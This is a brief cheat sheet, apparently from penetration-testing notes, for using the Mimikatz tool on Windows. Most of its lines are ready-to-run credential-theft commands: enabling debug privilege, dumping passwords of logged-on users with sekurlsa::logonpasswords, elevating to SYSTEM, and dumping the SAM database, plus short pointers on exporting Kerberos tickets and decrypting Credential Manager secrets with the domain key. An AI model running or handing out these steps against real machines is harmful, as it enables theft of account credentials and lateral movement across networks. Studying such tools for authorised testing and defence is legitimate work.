Mimikatz

A little tool to play with Windows security GitHub - gentilkiwi/mimikatz

Passwords & SAM

Launch mimikatz (as Administrator!)

mimikatz.exe

Engage SeDebugPrivilege

privilege::debug

-> OK

Whoami

token::whoami

Dump creds of all logged-on users

sekurlsa::logonpasswords

(Optional) Impersonate to nt authority\system

token::elevate

Dump sam database

lsadump::sam

Tickets

Show tickets

Export tickets

Credential manager saved credentials

howto ~ credential manager saved credentials · gentilkiwi/mimikatz Wiki · GitHub

Locally?

From DC?

-> Look for "[domainkey]", decrypt using same command with /rpc

Last updated